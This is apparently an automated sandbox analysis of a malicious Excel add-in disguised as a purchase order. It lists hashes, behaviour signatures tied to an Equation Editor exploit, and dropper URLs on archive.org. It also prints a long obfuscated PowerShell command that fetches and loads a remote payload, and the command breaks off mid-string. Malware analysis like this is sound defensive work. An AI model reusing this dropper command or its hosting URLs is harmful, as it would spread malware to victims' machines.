Overview

overview

10

Static

static

1

Orden de C...7.xlam

windows7-x64

10

Orden de C...7.xlam

windows11-21h2-x64

1

Analysis

  • max time kernel
    60s
  • max time network
    17s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    21/08/2024, 17:50

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Orden de Compra No. 565344657.xlam

  • Size

    671KB

  • MD5

    2e0db534d6635faac395d4cd17246bc6

  • SHA1

    d5c7b7f9f8e437f9ad43cc125c9db97d388e298b

  • SHA256

    938d1b0a5ac7ece316f0f0ed5cd8617e0d355248263434a9f48dac95f6c1b14f

  • SHA512

    f050585b8d2a16371f7b7ce4aa18829f57b3a8ea7b7f98862bf854305290af5cafe589e0fc1adaf760c2d5d2af68cd44c85728f90d6b5df540456615f6495ed4

  • SSDEEP

    12288:n/PzpHMrabWFSWHk+SQGEY9A+qxu0c6xBS/Bo0xGXtnOQhyt2UiabtprVC:3zBwFSeX1G0+qiaBwo6GXQQhy04rQ

Score
10/10
discoveryexecution

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg
exe.dropper

https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

    execution
  • Drops file in System32 directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

    exploit
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Orden de Compra No. 565344657.xlam"
    1⤵
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:848
  • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
    "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    1⤵
    • Blocklisted process makes network request
    • System Location Discovery: System Language Discovery
    • Launches Equation Editor
    • Suspicious use of WriteProcessMemory
    PID:2288
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\equitosxxmenacegirlfriend.vbs"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2700
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J⫣ ∨ ☦ ⧳ ⇷Bp⫣ ∨ ☦ ⧳ ⇷G0⫣ ∨ ☦ ⧳ ⇷YQBn⫣ ∨ ☦ ⧳ ⇷GU⫣ ∨ ☦ ⧳ ⇷VQBy⫣ ∨ ☦ ⧳ ⇷Gw⫣ ∨ ☦ ⧳ ⇷I⫣ ∨ ☦ ⧳ ⇷⫣ ∨ ☦ ⧳ ⇷9⫣ ∨ ☦ ⧳ ⇷C⫣ ∨ ☦ ⧳ ⇷⫣ ∨ ☦ ⧳ ⇷JwBo⫣ ∨ ☦ ⧳ ⇷HQ⫣ ∨ ☦ ⧳ ⇷d⫣ ∨ ☦ ⧳ ⇷Bw⫣ ∨ ☦ ⧳ ⇷HM⫣ ∨ ☦ ⧳ ⇷Og⫣ ∨ ☦ ⧳ ⇷v⫣ ∨ ☦ ⧳ ⇷C8⫣ ∨ ☦ ⧳ ⇷aQBh⫣ ∨ ☦ ⧳ ⇷Dg⫣ ∨ ☦ ⧳ ⇷M⫣ ∨ ☦ ⧳ ⇷⫣ ∨ ☦ ⧳ ⇷z⫣ ∨ ☦ ⧳ ⇷DE⫣ ∨ ☦ ⧳ ⇷M⫣ ∨ ☦ ⧳ ⇷⫣ ∨ ☦ ⧳ ⇷0⫣ ∨ ☦ ⧳ ⇷C4⫣ ∨ ☦ ⧳ ⇷dQBz⫣ ∨ ☦ ⧳ ⇷C4⫣ ∨ ☦ ⧳ ⇷YQBy⫣ ∨ ☦ ⧳ ⇷GM⫣ ∨ ☦ ⧳ ⇷a⫣ ∨ ☦ ⧳ ⇷Bp⫣ ∨ ☦ ⧳ ⇷HY⫣ ∨ ☦ ⧳ ⇷ZQ⫣ ∨ ☦ ⧳ ⇷u⫣ ∨ ☦ ⧳ ⇷G8⫣ ∨ ☦ ⧳ ⇷cgBn⫣ ∨ ☦ ⧳ ⇷C8⫣ ∨ ☦ ⧳ ⇷Mg⫣ ∨ ☦ ⧳ ⇷3⫣ ∨ ☦ ⧳ ⇷C8⫣ ∨ ☦ ⧳ ⇷aQB0⫣ ∨ ☦ ⧳ ⇷GU⫣ ∨ ☦ ⧳ ⇷bQBz⫣ ∨ ☦ ⧳ ⇷C8⫣ ∨ ☦ ⧳ ⇷dgBi⫣ ∨ ☦ ⧳ ⇷HM⫣ ∨ ☦ ⧳ ⇷Xw⫣ ∨ ☦ ⧳ ⇷y⫣ ∨ ☦ ⧳ ⇷D⫣ ∨ ☦ ⧳ ⇷⫣ ∨ ☦ ⧳ ⇷Mg⫣ ∨ ☦ ⧳ ⇷0⫣ ∨ ☦ ⧳ ⇷D⫣ ∨ ☦ ⧳ ⇷⫣ ∨ ☦ ⧳ ⇷Nw⫣ ∨ ☦ ⧳ ⇷y⫣ ∨ ☦ ⧳ ⇷DY⫣ ∨ ☦ ⧳ ⇷Xw⫣ ∨ ☦ ⧳ ⇷y⫣ ∨ ☦ ⧳ ⇷D⫣ ∨ ☦ ⧳ ⇷⫣ ∨ ☦ ⧳ ⇷Mg⫣ ∨ ☦ ⧳ ⇷0⫣ ∨ ☦ ⧳ ⇷D⫣ ∨ ☦ ⧳ ⇷⫣ ∨ ☦ ⧳ ⇷Nw⫣ ∨ ☦ ⧳ ⇷y⫣ ∨ ☦ ⧳ ⇷DY⫣ ∨ ☦ ⧳ ⇷LwB2⫣ ∨ ☦ ⧳ ⇷GI⫣ ∨ ☦ ⧳ ⇷cw⫣ ∨ ☦ ⧳ ⇷u⫣ ∨ ☦ ⧳ ⇷Go⫣ ∨ ☦ ⧳ ⇷c⫣ ∨ ☦ ⧳ ⇷Bn⫣ ∨ ☦ ⧳ ⇷Cc⫣ ∨ ☦ ⧳ ⇷Ow⫣ ∨ ☦ ⧳ ⇷k⫣ ∨ ☦ ⧳ ⇷Hc⫣ ∨ ☦ ⧳ ⇷ZQBi⫣ ∨ ☦ ⧳ ⇷EM⫣ ∨ ☦ ⧳ ⇷b⫣ ∨ ☦ ⧳ ⇷Bp⫣ ∨ ☦ ⧳ ⇷GU⫣ ∨ ☦ ⧳ ⇷bgB0⫣ ∨ ☦ ⧳ ⇷C⫣ ∨ ☦ ⧳ ⇷⫣ ∨ ☦ ⧳ ⇷PQ⫣ ∨ ☦ ⧳ ⇷g⫣ ∨ ☦ ⧳ ⇷E4⫣ ∨ ☦ ⧳ ⇷ZQB3⫣ ∨ ☦ ⧳ ⇷C0⫣ ∨ ☦ ⧳ ⇷TwBi⫣ ∨ ☦ ⧳ ⇷Go⫣ ∨ ☦ ⧳ ⇷ZQBj⫣ ∨ ☦ ⧳ ⇷HQ⫣ ∨ ☦ ⧳ ⇷I⫣ ∨ ☦ ⧳ ⇷BT⫣ ∨ ☦ ⧳ ⇷Hk⫣ ∨ ☦ ⧳ ⇷cwB0⫣ ∨ ☦ ⧳ ⇷GU⫣ ∨ ☦ ⧳ ⇷bQ⫣ ∨ ☦ ⧳ ⇷u⫣ ∨ ☦ ⧳ ⇷E4⫣ ∨ ☦ ⧳ ⇷ZQB0⫣ ∨ ☦ ⧳ ⇷C4⫣ ∨ ☦ ⧳ ⇷VwBl⫣ ∨ ☦ ⧳ ⇷GI⫣ ∨ ☦ ⧳ ⇷QwBs⫣ ∨ ☦ ⧳ ⇷Gk⫣ ∨ ☦ ⧳ ⇷ZQBu⫣ ∨ ☦ ⧳ ⇷HQ⫣ ∨ ☦ ⧳ ⇷Ow⫣ ∨ ☦ ⧳ ⇷k⫣ ∨ ☦ ⧳ ⇷Gk⫣ ∨ ☦ ⧳ ⇷bQBh⫣ ∨ ☦ ⧳ ⇷Gc⫣ ∨ ☦ ⧳ ⇷ZQBC⫣ ∨ ☦ ⧳ ⇷Hk⫣ ∨ ☦ ⧳ ⇷d⫣ ∨ ☦ ⧳ ⇷Bl⫣ ∨ ☦ ⧳ ⇷HM⫣ ∨ ☦ ⧳ ⇷I⫣ ∨ ☦ ⧳ ⇷⫣ ∨ ☦ ⧳ ⇷9⫣ ∨ ☦ ⧳ ⇷C⫣ ∨ ☦ ⧳ ⇷⫣ ∨ ☦ ⧳ ⇷J⫣ ∨ ☦ ⧳ ⇷B3⫣ ∨ ☦ ⧳ ⇷GU⫣ ∨ ☦ ⧳ ⇷YgBD⫣ ∨ ☦ ⧳ ⇷Gw⫣ ∨ ☦ ⧳ ⇷aQBl⫣ ∨ ☦ ⧳ ⇷G4⫣ ∨ ☦ ⧳ ⇷d⫣ ∨ ☦ ⧳ ⇷⫣ ∨ ☦ ⧳ ⇷u⫣ ∨ ☦ ⧳ ⇷EQ⫣ ∨ ☦ ⧳ ⇷bwB3⫣ ∨ ☦ ⧳ ⇷G4⫣ ∨ ☦ ⧳ ⇷b⫣ ∨ ☦ ⧳ ⇷Bv⫣ ∨ ☦ ⧳ ⇷GE⫣ ∨ ☦ ⧳ ⇷Z⫣ ∨ ☦ ⧳ ⇷BE⫣ ∨ ☦ ⧳ ⇷GE⫣ ∨ ☦ ⧳ ⇷d⫣ ∨ ☦ ⧳ ⇷Bh⫣ ∨ ☦ ⧳ ⇷Cg⫣ ∨ ☦ ⧳ ⇷J⫣ ∨ ☦ ⧳ ⇷Bp⫣ ∨ ☦ ⧳ ⇷G0⫣ ∨ ☦ ⧳ ⇷YQBn⫣ ∨ ☦ ⧳ ⇷GU⫣ ∨ ☦ ⧳ ⇷VQBy⫣ ∨ ☦ ⧳ ⇷Gw⫣ ∨ ☦ ⧳ ⇷KQ⫣ ∨ ☦ ⧳ ⇷7⫣ ∨ ☦ ⧳ ⇷CQ⫣ ∨ ☦ ⧳ ⇷aQBt⫣ ∨ ☦ ⧳ ⇷GE⫣ ∨ ☦ ⧳ ⇷ZwBl⫣ ∨ ☦ ⧳ ⇷FQ⫣ ∨ ☦ ⧳ ⇷ZQB4⫣ ∨ ☦ ⧳ ⇷HQ⫣ ∨ ☦ ⧳ ⇷I⫣ ∨ ☦ ⧳ ⇷⫣ ∨ ☦ ⧳ ⇷9⫣ ∨ ☦ ⧳ ⇷C⫣ ∨ ☦ ⧳ ⇷⫣ ∨ ☦ ⧳ ⇷WwBT⫣ ∨ ☦ ⧳ ⇷Hk⫣ ∨ ☦ ⧳ ⇷cwB0⫣ ∨ ☦ ⧳ ⇷GU⫣ ∨ ☦ ⧳ ⇷bQ⫣ ∨ ☦ ⧳ ⇷u⫣ ∨ ☦ ⧳ ⇷FQ⫣ ∨ ☦ ⧳ ⇷ZQB4⫣ ∨ ☦ ⧳ ⇷HQ⫣ ∨ ☦ ⧳ ⇷LgBF⫣ ∨ ☦ ⧳ ⇷G4⫣ ∨ ☦ ⧳ ⇷YwBv⫣ ∨ ☦ ⧳ ⇷GQ⫣ ∨ ☦ ⧳ ⇷aQBu⫣ ∨ ☦ ⧳ ⇷Gc⫣ ∨ ☦ ⧳ ⇷XQ⫣ ∨ ☦ ⧳ ⇷6⫣ ∨ ☦ ⧳ ⇷Do⫣ ∨ ☦ ⧳ ⇷VQBU⫣ ∨ ☦ ⧳ ⇷EY⫣ ∨ ☦ ⧳ ⇷O⫣ ∨ ☦ ⧳ ⇷⫣ ∨ ☦ ⧳ ⇷u⫣ ∨ ☦ ⧳ ⇷Ec⫣ ∨ ☦ ⧳ ⇷ZQB0⫣ ∨ ☦ ⧳ ⇷FM⫣ ∨ ☦ ⧳ ⇷d⫣ ∨ ☦ ⧳ ⇷By⫣ ∨ ☦ ⧳ ⇷Gk⫣ ∨ ☦ ⧳ ⇷bgBn⫣ ∨ ☦ ⧳ ⇷Cg⫣ ∨ ☦ ⧳ ⇷J⫣ ∨ ☦ ⧳ ⇷Bp⫣ ∨ ☦ ⧳ ⇷G0⫣ ∨ ☦ ⧳ ⇷YQBn⫣ ∨ ☦ ⧳ ⇷GU⫣ ∨ ☦ ⧳ ⇷QgB5⫣ ∨ ☦ ⧳ ⇷HQ⫣ ∨ ☦ ⧳ ⇷ZQBz⫣ ∨ ☦ ⧳ ⇷Ck⫣ ∨ ☦ ⧳ ⇷Ow⫣ ∨ ☦ ⧳ ⇷k⫣ ∨ ☦ ⧳ ⇷HM⫣ ∨ ☦ ⧳ ⇷d⫣ ∨ ☦ ⧳ ⇷Bh⫣ ∨ ☦ ⧳ ⇷HI⫣ ∨ ☦ ⧳ ⇷d⫣ ∨ ☦ ⧳ ⇷BG⫣ ∨ ☦ ⧳ ⇷Gw⫣ ∨ ☦ ⧳ ⇷YQBn⫣ ∨ ☦ ⧳ ⇷C⫣ ∨ ☦ ⧳ ⇷⫣ ∨ ☦ ⧳ ⇷PQ⫣ ∨ ☦ ⧳ ⇷g⫣ ∨ ☦ ⧳ ⇷Cc⫣ ∨ ☦ ⧳ ⇷P⫣ ∨ ☦ ⧳ ⇷⫣ ∨ ☦ ⧳ ⇷8⫣ ∨ ☦ ⧳ ⇷EI⫣ ∨ ☦ ⧳ ⇷QQBT⫣ ∨ ☦ ⧳ ⇷EU⫣ ∨ ☦ ⧳ ⇷Ng⫣ ∨ ☦ ⧳ ⇷0⫣ ∨ ☦ ⧳ ⇷F8⫣ ∨ ☦ ⧳ ⇷UwBU⫣ ∨ ☦ ⧳ ⇷EE⫣ ∨ ☦ ⧳ ⇷UgBU⫣ ∨ ☦ ⧳ ⇷D4⫣ ∨ ☦ ⧳ ⇷Pg⫣ ∨ ☦ ⧳ ⇷n⫣ ∨ ☦ ⧳ ⇷Ds⫣ ∨ ☦ ⧳ ⇷J⫣ ∨ ☦ ⧳ ⇷Bl⫣ ∨ ☦ ⧳ ⇷G4⫣ ∨ ☦ ⧳ ⇷Z⫣ ∨ ☦ ⧳ ⇷BG⫣ ∨ ☦ ⧳ ⇷Gw⫣ ∨ ☦ ⧳ ⇷YQBn⫣ ∨ ☦ ⧳ ⇷C⫣ ∨ ☦ ⧳ ⇷⫣ ∨ ☦ ⧳ ⇷PQ⫣ ∨ ☦ ⧳ ⇷g⫣ ∨ ☦ ⧳ ⇷Cc⫣ ∨ ☦ ⧳ ⇷P⫣ ∨ ☦ ⧳ ⇷⫣ ∨ ☦ ⧳ ⇷8⫣ ∨ ☦ ⧳ ⇷EI⫣ ∨ ☦ ⧳ ⇷QQBT⫣ ∨ ☦ ⧳ ⇷EU⫣ ∨ ☦ ⧳ ⇷Ng⫣ ∨ ☦ ⧳ ⇷0⫣ ∨ ☦ ⧳ ⇷F8⫣ ∨ ☦ ⧳ ⇷RQBO⫣ ∨ ☦ ⧳ ⇷EQ⫣ ∨ ☦ ⧳ ⇷Pg⫣ ∨ ☦ ⧳ ⇷+⫣ ∨ ☦ ⧳ ⇷Cc⫣ ∨ ☦ ⧳ ⇷Ow⫣ ∨ ☦ ⧳ ⇷k⫣ ∨ ☦ ⧳ ⇷HM⫣ ∨ ☦ ⧳ ⇷d⫣ ∨ ☦ ⧳ ⇷Bh⫣ ∨ ☦ ⧳ ⇷HI⫣ ∨ ☦ ⧳ ⇷d⫣ ∨ ☦ ⧳ ⇷BJ⫣ ∨ ☦ ⧳ ⇷G4⫣ ∨ ☦ ⧳ ⇷Z⫣ ∨ ☦ ⧳ ⇷Bl⫣ ∨ ☦ ⧳ ⇷Hg⫣ ∨ ☦ ⧳ ⇷I⫣ ∨ ☦ ⧳ ⇷⫣ ∨ ☦ ⧳ ⇷9⫣ ∨ ☦ ⧳ ⇷C⫣ ∨ ☦ ⧳ ⇷⫣ ∨ ☦ ⧳ ⇷J⫣ ∨ ☦ ⧳ ⇷Bp⫣ ∨ ☦ ⧳ ⇷G0⫣ ∨ ☦ ⧳ ⇷YQBn⫣ ∨ ☦ ⧳ ⇷GU⫣ ∨ ☦ ⧳ ⇷V⫣ ∨ ☦ ⧳ ⇷Bl⫣ ∨ ☦ ⧳ ⇷Hg⫣ ∨ ☦ ⧳ ⇷d⫣ ∨ ☦ ⧳ ⇷⫣ ∨ ☦ ⧳ ⇷u⫣ ∨ ☦ ⧳ ⇷Ek⫣ ∨ ☦ ⧳ ⇷bgBk⫣ ∨ ☦ ⧳ ⇷GU⫣ ∨ ☦ ⧳ ⇷e⫣ ∨ ☦ ⧳ ⇷BP⫣ ∨ ☦ ⧳ ⇷GY⫣ ∨ ☦ ⧳ ⇷K⫣ ∨ ☦ ⧳ ⇷⫣ ∨ ☦ ⧳ ⇷k⫣ ∨ ☦ ⧳ ⇷HM⫣ ∨ ☦ ⧳ ⇷d⫣ ∨ ☦ ⧳ ⇷Bh⫣ ∨ ☦ ⧳ ⇷HI⫣ ∨ ☦ ⧳ ⇷d⫣ ∨ ☦ ⧳ ⇷BG⫣ ∨ ☦ ⧳ ⇷Gw⫣ ∨ ☦ ⧳ ⇷YQBn⫣ ∨ ☦ ⧳ ⇷Ck⫣ ∨ ☦ ⧳ ⇷Ow⫣ ∨ ☦ ⧳ ⇷k⫣ ∨ ☦ ⧳ ⇷GU⫣ ∨ ☦ ⧳ ⇷bgBk⫣ ∨ ☦ ⧳ ⇷Ek⫣ ∨ ☦ ⧳ ⇷bgBk⫣ ∨ ☦ ⧳ ⇷GU⫣ ∨ ☦ ⧳ ⇷e⫣ ∨ ☦ ⧳ ⇷⫣ ∨ ☦ ⧳ ⇷g⫣ ∨ ☦ ⧳ ⇷D0⫣ ∨ ☦ ⧳ ⇷I⫣ ∨ ☦ ⧳ ⇷⫣ ∨ ☦ ⧳ ⇷k⫣ ∨ ☦ ⧳ ⇷Gk⫣ ∨ ☦ ⧳ ⇷bQBh⫣ ∨ ☦ ⧳ ⇷Gc⫣ ∨ ☦ ⧳ ⇷ZQBU⫣ ∨ ☦ ⧳ ⇷GU⫣ ∨ ☦ ⧳ ⇷e⫣ ∨ ☦ ⧳ ⇷B0⫣ ∨ ☦ ⧳ ⇷C4⫣ ∨ ☦ ⧳ ⇷SQBu⫣ ∨ ☦ ⧳ ⇷GQ⫣ ∨ ☦ ⧳ ⇷ZQB4⫣ ∨ ☦ ⧳ ⇷E8⫣ ∨ ☦ ⧳ ⇷Zg⫣ ∨ ☦ ⧳ ⇷o⫣ ∨ ☦ ⧳ ⇷CQ⫣ ∨ ☦ ⧳ ⇷ZQBu⫣ ∨ ☦ ⧳ ⇷GQ⫣ ∨ ☦ ⧳ ⇷RgBs⫣ ∨ ☦ ⧳ ⇷GE⫣ ∨ ☦ ⧳ ⇷Zw⫣ ∨ ☦ ⧳ ⇷p⫣ ∨ ☦ ⧳ ⇷Ds⫣ ∨ ☦ ⧳ ⇷J⫣ ∨ ☦ ⧳ ⇷Bz⫣ ∨ ☦ ⧳ ⇷HQ⫣ ∨ ☦ ⧳ ⇷YQBy⫣ ∨ ☦ ⧳ ⇷HQ⫣ ∨ ☦ ⧳ ⇷SQBu⫣ ∨ ☦ ⧳ ⇷GQ⫣ ∨ ☦ ⧳ ⇷ZQB4⫣ ∨ ☦ ⧳ ⇷C⫣ ∨ ☦ ⧳ ⇷⫣ ∨ ☦ ⧳ ⇷LQBn⫣ ∨ ☦ ⧳ ⇷GU⫣ ∨ ☦ ⧳ ⇷I⫣ ∨ ☦ ⧳ ⇷⫣ ∨ ☦ ⧳ ⇷w⫣ ∨ ☦ ⧳ ⇷C⫣ ∨ ☦ ⧳ ⇷⫣ ∨ ☦ ⧳ ⇷LQBh⫣ ∨ ☦ ⧳ ⇷G4⫣ ∨ ☦ ⧳ ⇷Z⫣ ∨ ☦ ⧳ ⇷⫣ ∨ ☦ ⧳ ⇷g⫣ ∨ ☦ ⧳ ⇷CQ⫣ ∨ ☦ ⧳ ⇷ZQBu⫣ ∨ ☦ ⧳ ⇷GQ⫣ ∨ ☦ ⧳ ⇷SQBu⫣ ∨ ☦ ⧳ ⇷GQ⫣ ∨ ☦ ⧳ ⇷ZQB4⫣ ∨ ☦ ⧳ ⇷C⫣ ∨ ☦ ⧳ ⇷⫣ ∨ ☦ ⧳ ⇷LQBn⫣ ∨ ☦ ⧳ ⇷HQ⫣ ∨ ☦ ⧳ ⇷I⫣ ∨ ☦ ⧳ ⇷⫣ ∨ ☦ ⧳ ⇷k⫣ ∨ ☦ ⧳ ⇷HM⫣ ∨ ☦ ⧳ ⇷d⫣ ∨ ☦ ⧳ ⇷Bh⫣ ∨ ☦ ⧳ ⇷HI⫣ ∨ ☦ ⧳ ⇷d⫣ ∨ ☦ ⧳ ⇷BJ⫣ ∨ ☦ ⧳ ⇷G4⫣ ∨ ☦ ⧳ ⇷Z⫣ ∨ ☦ ⧳ ⇷Bl⫣ ∨ ☦ ⧳ ⇷Hg⫣ ∨ ☦ ⧳ ⇷Ow⫣ ∨ ☦ ⧳ ⇷k⫣ ∨ ☦ ⧳ ⇷HM⫣ ∨ ☦ ⧳ ⇷d⫣ ∨ ☦ ⧳ ⇷Bh⫣ ∨ ☦ ⧳ ⇷HI⫣ ∨ ☦ ⧳ ⇷d⫣ ∨ ☦ ⧳ ⇷BJ⫣ ∨ ☦ ⧳ ⇷G4⫣ ∨ ☦ ⧳ ⇷Z⫣ ∨ ☦ ⧳ ⇷Bl⫣ ∨ ☦ ⧳ ⇷Hg⫣ ∨ ☦ ⧳ ⇷I⫣ ∨ ☦ ⧳ ⇷⫣ ∨ ☦ ⧳ ⇷r⫣ ∨ ☦ ⧳ ⇷D0⫣ ∨ ☦ ⧳ ⇷I⫣ ∨ ☦ ⧳ ⇷⫣ ∨ ☦ ⧳ ⇷k⫣ ∨ ☦ ⧳ ⇷HM⫣ ∨ ☦ ⧳ ⇷d⫣ ∨ ☦ ⧳ ⇷Bh⫣ ∨ ☦ ⧳ ⇷HI⫣ ∨ ☦ ⧳ ⇷d⫣ ∨ ☦ ⧳ ⇷BG⫣ ∨ ☦ ⧳ ⇷Gw⫣ ∨ ☦ ⧳ ⇷YQBn⫣ ∨ ☦ ⧳ ⇷C4⫣ ∨ ☦ ⧳ ⇷T⫣ ∨ ☦ ⧳ ⇷Bl⫣ ∨ ☦ ⧳ ⇷G4⫣ ∨ ☦ ⧳ ⇷ZwB0⫣ ∨ ☦ ⧳ ⇷Gg⫣ ∨ ☦ ⧳ ⇷Ow⫣ ∨ ☦ ⧳ ⇷k⫣ ∨ ☦ ⧳ ⇷GI⫣ ∨ ☦ ⧳ ⇷YQBz⫣ ∨ ☦ ⧳ ⇷GU⫣ ∨ ☦ ⧳ ⇷Ng⫣ ∨ ☦ ⧳ ⇷0⫣ ∨ ☦ ⧳ ⇷Ew⫣ ∨ ☦ ⧳ ⇷ZQBu⫣ ∨ ☦ ⧳ ⇷Gc⫣ ∨ ☦ ⧳ ⇷d⫣ ∨ ☦ ⧳ ⇷Bo⫣ ∨ ☦ ⧳ ⇷C⫣ ∨ ☦ ⧳ ⇷⫣ ∨ ☦ ⧳ ⇷PQ⫣ ∨ ☦ ⧳ ⇷g⫣ ∨ ☦ ⧳ ⇷CQ⫣ ∨ ☦ ⧳ ⇷ZQBu⫣ ∨ ☦ ⧳ ⇷GQ⫣ ∨ ☦ ⧳ ⇷SQBu⫣ ∨ ☦ ⧳ ⇷GQ⫣ ∨ ☦ ⧳ ⇷ZQB4⫣ ∨ ☦ ⧳ ⇷C⫣ ∨ ☦ ⧳ ⇷⫣ ∨ ☦ ⧳ ⇷LQ⫣ ∨ ☦ ⧳ ⇷g⫣ ∨ ☦ ⧳ ⇷CQ⫣ ∨ ☦ ⧳ ⇷cwB0⫣ ∨ ☦ ⧳ ⇷GE⫣ ∨ ☦ ⧳ ⇷cgB0⫣ ∨ ☦ ⧳ ⇷Ek⫣ ∨ ☦ ⧳ ⇷bgBk⫣ ∨ ☦ ⧳ ⇷GU⫣ ∨ ☦ ⧳ ⇷e⫣ ∨ ☦ ⧳ ⇷⫣ ∨ ☦ ⧳ ⇷7⫣ ∨ ☦ ⧳ ⇷CQ⫣ ∨ ☦ ⧳ ⇷YgBh⫣ ∨ ☦ ⧳ ⇷HM⫣ ∨ ☦ ⧳ ⇷ZQ⫣ ∨ ☦ ⧳ ⇷2⫣ ∨ ☦ ⧳ ⇷DQ⫣ ∨ ☦ ⧳ ⇷QwBv⫣ ∨ ☦ ⧳ ⇷G0⫣ ∨ ☦ ⧳ ⇷bQBh⫣ ∨ ☦ ⧳ ⇷G4⫣ ∨ ☦ ⧳ ⇷Z⫣ ∨ ☦ ⧳ ⇷⫣ ∨ ☦ ⧳ ⇷g⫣ ∨ ☦ ⧳ ⇷D0⫣ ∨ ☦ ⧳ ⇷I⫣ ∨ ☦ ⧳ ⇷⫣ ∨ ☦ ⧳ ⇷k⫣ ∨ ☦ ⧳ ⇷Gk⫣ ∨ ☦ ⧳ ⇷bQBh⫣ ∨ ☦ ⧳ ⇷Gc⫣ ∨ ☦ ⧳ ⇷ZQBU⫣ ∨ ☦ ⧳ ⇷GU⫣ ∨ ☦ ⧳ ⇷e⫣ ∨ ☦ ⧳ ⇷B0⫣ ∨ ☦ ⧳ ⇷C4⫣ ∨ ☦ ⧳ ⇷UwB1⫣ ∨ ☦ ⧳ ⇷GI⫣ ∨ ☦ ⧳ ⇷cwB0⫣ ∨ ☦ ⧳ ⇷HI⫣ ∨ ☦ ⧳ ⇷aQBu⫣ ∨ ☦ ⧳ ⇷Gc⫣ ∨ ☦ ⧳ ⇷K⫣ ∨ ☦ ⧳ ⇷⫣ ∨ ☦ ⧳ ⇷k⫣ ∨ ☦ ⧳ ⇷HM⫣ ∨ ☦ ⧳ ⇷d⫣ ∨ ☦ ⧳ ⇷Bh⫣ ∨ ☦ ⧳ ⇷HI⫣ ∨ ☦ ⧳ ⇷d⫣ ∨ ☦ ⧳ ⇷BJ⫣ ∨ ☦ ⧳ ⇷G4⫣ ∨ ☦ ⧳ ⇷Z⫣ ∨ ☦ ⧳ ⇷Bl⫣ ∨ ☦ ⧳ ⇷Hg⫣ ∨ ☦ ⧳ ⇷L⫣ ∨ ☦ ⧳ ⇷⫣ ∨ ☦ ⧳ ⇷g⫣ ∨ ☦ ⧳ ⇷CQ⫣ ∨ ☦ ⧳ ⇷YgBh⫣ ∨ ☦ ⧳ ⇷HM⫣ ∨ ☦ ⧳ ⇷ZQ⫣ ∨ ☦ ⧳ ⇷2⫣ ∨ ☦ ⧳ ⇷DQ⫣ ∨ ☦ ⧳ ⇷T⫣ ∨ ☦ ⧳ ⇷Bl⫣ ∨ ☦ ⧳ ⇷G4⫣ ∨ ☦ ⧳ ⇷ZwB0⫣ ∨ ☦ ⧳ ⇷Gg⫣ ∨ ☦ ⧳ ⇷KQ⫣ ∨ ☦ ⧳ ⇷7⫣ ∨ ☦ ⧳ ⇷CQ⫣ ∨ ☦ ⧳ ⇷YwBv⫣ ∨ ☦ ⧳ ⇷G0⫣ ∨ ☦ ⧳ ⇷bQBh⫣ ∨ ☦ ⧳ ⇷G4⫣ ∨ ☦ ⧳ ⇷Z⫣ ∨ ☦ ⧳ ⇷BC⫣ ∨ ☦ ⧳ ⇷Hk⫣ ∨ ☦ ⧳ ⇷d⫣ ∨ ☦ ⧳ ⇷Bl⫣ ∨ ☦ ⧳ ⇷HM⫣ ∨ ☦ ⧳ ⇷I⫣ ∨ ☦ ⧳ ⇷⫣ ∨ ☦ ⧳ ⇷9⫣ ∨ ☦ ⧳ ⇷C⫣ ∨ ☦ ⧳ ⇷⫣ ∨ ☦ ⧳ ⇷WwBT⫣ ∨ ☦ ⧳ ⇷Hk⫣ ∨ ☦ ⧳ ⇷cwB0⫣ ∨ ☦ ⧳ ⇷GU⫣ ∨ ☦ ⧳ ⇷bQ⫣ ∨ ☦ ⧳ ⇷u⫣ ∨ ☦ ⧳ ⇷EM⫣ ∨ ☦ ⧳ ⇷bwBu⫣ ∨ ☦ ⧳ ⇷HY⫣ ∨ ☦ ⧳ ⇷ZQBy⫣ ∨ ☦ ⧳ ⇷HQ⫣ ∨ ☦ ⧳ ⇷XQ⫣ ∨ ☦ ⧳ ⇷6⫣ ∨ ☦ ⧳ ⇷Do⫣ ∨ ☦ ⧳ ⇷RgBy⫣ ∨ ☦ ⧳ ⇷G8⫣ ∨ ☦ ⧳ ⇷bQBC⫣ ∨ ☦ ⧳ ⇷GE⫣ ∨ ☦ ⧳ ⇷cwBl⫣ ∨ ☦ ⧳ ⇷DY⫣ ∨ ☦ ⧳ ⇷N⫣ ∨ ☦ ⧳ ⇷BT⫣ ∨ ☦ ⧳ ⇷HQ⫣ ∨ ☦ ⧳ ⇷cgBp⫣ ∨ ☦ ⧳ ⇷G4⫣ ∨ ☦ ⧳ ⇷Zw⫣ ∨ ☦ ⧳ ⇷o⫣ 